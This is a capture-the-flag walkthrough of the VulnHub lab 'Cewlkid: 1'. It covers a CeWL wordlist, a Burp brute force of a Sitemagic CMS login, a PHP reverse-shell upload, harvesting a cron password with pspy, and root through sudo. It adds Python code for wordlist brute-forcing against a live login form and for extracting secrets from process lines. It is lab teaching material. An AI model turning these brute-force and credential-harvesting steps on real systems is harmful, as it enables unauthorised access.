Today we are going to solve another boot2root challenge called "Cewlkid: 1". It is available on VulnHub for penetration testing practice and you can download it from there. Credit for building this lab goes to @iamv1nc3nt. Let's start and learn how to root it.
Penetration Testing Methodology
- Brute force login Sitemagic CMS with Burp
- Sitemagic Arbitrary File Upload
- Abuse crontab with plain passwords
- Abuse of sudo
- Capture the flag
First we look for the IP address of the target machine on the local network with netdiscover:
netdiscover -i ethX
Once we have the IP address, the next step is a port scan of the whole TCP range with service and version detection, for which we use nmap as shown in the following image:
nmap -A -p- 192.168.10.183
Port 80 also serves a web application, but it is of no use for this challenge, so we move on to port 8080, where a Sitemagic CMS is running.
Reviewing the content and the different sections of the site, we find the link to the administration panel of the web application.
With this information, and given that the machine is called "Cewlkid", it is fairly clear that we are expected to build a dictionary with the tool "CeWL" by spidering the different sections of the site, and that the admin password will be one of the words it collects.
With the help of Burp Suite (Intruder) and the dictionary we just created, we brute-force the login for the user "admin" (the default user according to the official documentation).
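The two steps above (CeWL-style word collection, then a dictionary attack on the login) as an added example, not code from the original write-up and not CeWL or Burp Intruder themselves. The sample pages are constructed HTML standing in for the crawled site, `fake_login` is an offline stand-in for the real login request (the password it accepts is an assumption, not the machine's credential), and the form field names in `http_login` are placeholders to be copied from the request captured in Burp.

```python
"""CeWL-style wordlist generation followed by a login brute force.

Added example for this write-up; it is neither CeWL nor Burp Intruder, just the
same two steps in Python so they can be run offline. SAMPLE_PAGES is constructed
HTML standing in for the crawled site, and fake_login is a stand-in for the real
login request (the password it accepts is an assumption, not the box's password).
"""
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Optional

# Constructed pages, not content from the real target.
SAMPLE_PAGES = {
    "/": "<html><body><h1>Welcome to Cewlkid</h1><p>Skateboarding is cool. "
         "Visit our <a href='/about'>about</a> page.</p></body></html>",
    "/about": "<html><body><p>Cewlkid loves skateboarding and pizza. "
              "Skateboarding rules! &amp; more</p><script>var x=1;</script></body></html>",
}

# Drop <script>/<style> bodies entirely, then every remaining tag.
TAG_RE = re.compile(r"<(script|style)\b.*?</\1>|<[^>]+>", re.S)
WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9']*")


def extract_words(page_html: str, min_len: int = 5) -> List[str]:
    """Strip markup, unescape entities and return unique words of >= min_len, in page order."""
    text = html.unescape(TAG_RE.sub(" ", page_html))
    words: List[str] = []
    for w in WORD_RE.findall(text):
        if len(w) >= min_len and w not in words:
            words.append(w)
    return words


def build_wordlist(pages: Iterable[str], min_len: int = 5, mutate: bool = True) -> List[str]:
    """Merge words from all pages; with mutate=True also add lower/Capitalised/UPPER
    variants, the case changes people most often apply to a dictionary word."""
    wordlist: List[str] = []
    for page in pages:
        for w in extract_words(page, min_len):
            for v in ([w, w.lower(), w.capitalize(), w.upper()] if mutate else [w]):
                if v not in wordlist:
                    wordlist.append(v)
    return wordlist


def brute_force(username: str, candidates: Iterable[str],
                login: Callable[[str, str], bool]) -> Optional[str]:
    """Try each candidate against `login` and return the first accepted password.
    `login` is only the transport; Burp Intruder does the same with a payload list."""
    for password in candidates:
        if login(username, password):
            return password
    return None


def fake_login(username: str, password: str) -> bool:
    """Offline stand-in for the login form. The accepted password is an assumption
    chosen so the demo works; it is not the real machine's credential."""
    return username == "admin" and password == "Pizza"


def http_login(url: str, user_field: str, pass_field: str,
               success_marker: str) -> Callable[[str, str], bool]:
    """Build a real login callback. Field names and the success marker are placeholders
    (assumptions): copy them from the request captured in Burp, exactly as you would
    when configuring Intruder. Not exercised offline."""
    def _login(username: str, password: str) -> bool:
        data = urllib.parse.urlencode({user_field: username, pass_field: password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return success_marker in resp.read().decode(errors="replace")
        except urllib.error.HTTPError:
            return False
    return _login


if __name__ == "__main__":
    wordlist = build_wordlist(SAMPLE_PAGES.values())
    print(f"{len(wordlist)} candidates, first few: {wordlist[:6]}")
    print("admin password:", brute_force("admin", wordlist, fake_login))
```

Note that with the case mutations the constructed password is found, while the raw word list alone misses it; on a real engagement the same applies, so feed Intruder the mutated list (or use a rule-based mutation in Burp) rather than CeWL's raw output. Also decide the success condition from a response difference you have observed (length, redirect, Set-Cookie), not from a guess.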
We log in to the control panel and confirm that the credentials are valid.
Once inside we can identify the exact version of the application and confirm that there is a public exploit for it that allows arbitrary file upload.
As always, we do a proof of concept to verify that the site is really vulnerable. For that we capture the following request.
The response to the above request is the following:
Perfect! We upload the file and see that we have indeed been able to upload the "info.php" file.
We repeat the same steps, but this time we upload a web shell (I used pentestmonkey's PHP reverse shell).
We start a netcat listener and then request our "shell.php" file in the browser; the PHP only executes when the file is requested, not when it is uploaded. The reverse shell connects back and we have access to the inside of the machine.
Privilege Escalation (Cewlbeans)
There are several users on the system. Running the tool "pspy64", we see that a remote connection is executed periodically (a cron job) as the user "cewlbeans", and the password is passed on the command line in plain text.
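What pspy showed here is the general problem of passwords placed in a command line: any local user can read them from the process list. Below is an added example, not part of the original write-up and not pspy itself, that scans pspy-style output for a few common ways a secret ends up in argv. The sample lines are constructed in pspy's line format and every password in them is made up; it generalises beyond the single cron job on this box.

```python
"""Flag process command lines that carry a password in clear text.

Added example for this write-up: it is not pspy and not output captured from the
box. SAMPLE_PSPY is constructed text in pspy's line format, and every password in
it is made up. The patterns cover several common ways a secret lands on a command
line, not just the one cron job in the walkthrough.
"""
import re
from typing import Dict, List, Optional

# Constructed pspy-style lines (format: timestamp CMD: UID=<uid> PID=<pid> | <cmdline>).
SAMPLE_PSPY = """\
2020/09/05 10:00:01 CMD: UID=0     PID=1480   | /usr/sbin/CRON -f
2020/09/05 10:00:01 CMD: UID=0     PID=1481   | /bin/sh -c sshpass -p 'Pa55w0rd_example' ssh -o StrictHostKeyChecking=no cewlbeans@127.0.0.1 /bin/true
2020/09/05 10:00:02 CMD: UID=33    PID=1482   | /usr/sbin/apache2 -k start
2020/09/05 10:00:03 CMD: UID=0     PID=1483   | mysql -u backup -pS3cretDB -e 'FLUSH TABLES'
2020/09/05 10:00:04 CMD: UID=0     PID=1484   | /bin/sh -c SSHPASS=Env_example sshpass -e scp /tmp/backup.tgz cewlbeans@127.0.0.1:/tmp/
2020/09/05 10:00:05 CMD: UID=1000  PID=1485   | curl -u svc:Cl0udP4ss https://127.0.0.1/api
2020/09/05 10:00:06 CMD: UID=0     PID=1486   | mysql -u root -p -e 'SHOW DATABASES'
"""

# One pspy "CMD:" line -> timestamp, uid, pid and the full command line.
PSPY_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s*\|\s*(?P<cmd>.*)$"
)

# Each pattern captures the secret in a group named "secret". Order matters:
# the first pattern that matches a line wins, so the env-variable form of
# sshpass is checked before the -p form.
CRED_PATTERNS = [
    ("SSHPASS env", re.compile(r"\bSSHPASS=(?P<secret>\S+)")),
    # sshpass -p secret / -p 'secret' / -psecret
    ("sshpass -p", re.compile(
        r"\bsshpass\s+(?:.*?\s)?-p\s*(?P<q>['\"]?)(?P<secret>[^\s'\"]+)(?P=q)")),
    # mysql -pSECRET; a bare "-p" followed by a space means "prompt", so no secret.
    ("mysql -p", re.compile(r"\bmysql\b.*?\s-p(?P<secret>\S+)")),
    ("curl -u", re.compile(r"\bcurl\b.*?\s-u\s+(?P<user>[^:\s]+):(?P<secret>\S+)")),
    ("password=", re.compile(r"(?i)(?:password|passwd|pwd)=(?P<secret>\S+)")),
]


def parse_pspy(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of a pspy CMD line, or None for anything else."""
    m = PSPY_LINE.match(line)
    return m.groupdict() if m else None


def find_credentials(output: str) -> List[Dict[str, str]]:
    """Scan pspy output and return one record per command line carrying a secret."""
    hits: List[Dict[str, str]] = []
    for line in output.splitlines():
        rec = parse_pspy(line)
        if not rec:
            continue
        for tool, pattern in CRED_PATTERNS:
            m = pattern.search(rec["cmd"])
            if m:
                hits.append({"pid": rec["pid"], "uid": rec["uid"], "tool": tool,
                             "secret": m.group("secret"), "cmd": rec["cmd"]})
                break  # one finding per line is enough
    return hits


if __name__ == "__main__":
    for h in find_credentials(SAMPLE_PSPY):
        print(f"UID={h['uid']} PID={h['pid']} [{h['tool']}] secret={h['secret']!r}")
        print(f"    {h['cmd']}")
```

The last constructed line (`mysql -u root -p`) is deliberately not reported: there `-p` means "prompt for the password", so nothing sensitive is on the command line. Running pspy is only a convenience; the same argv is visible to every local user through `ps` or `/proc/<pid>/cmdline` unless `/proc` is mounted with `hidepid`, which is why credentials belong in a protected file or environment rather than in a cron command.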
Privilege Escalation (root)
We authenticate as the user "cewlbeans", run "sudo -l" and find the pleasant surprise that we are allowed to execute any binary as any user.
Let's not waste time: we use sudo to spawn /bin/sh as root and read the flag.
Author: David Utón is a Penetration Tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. He can be contacted on LinkedIn and Twitter.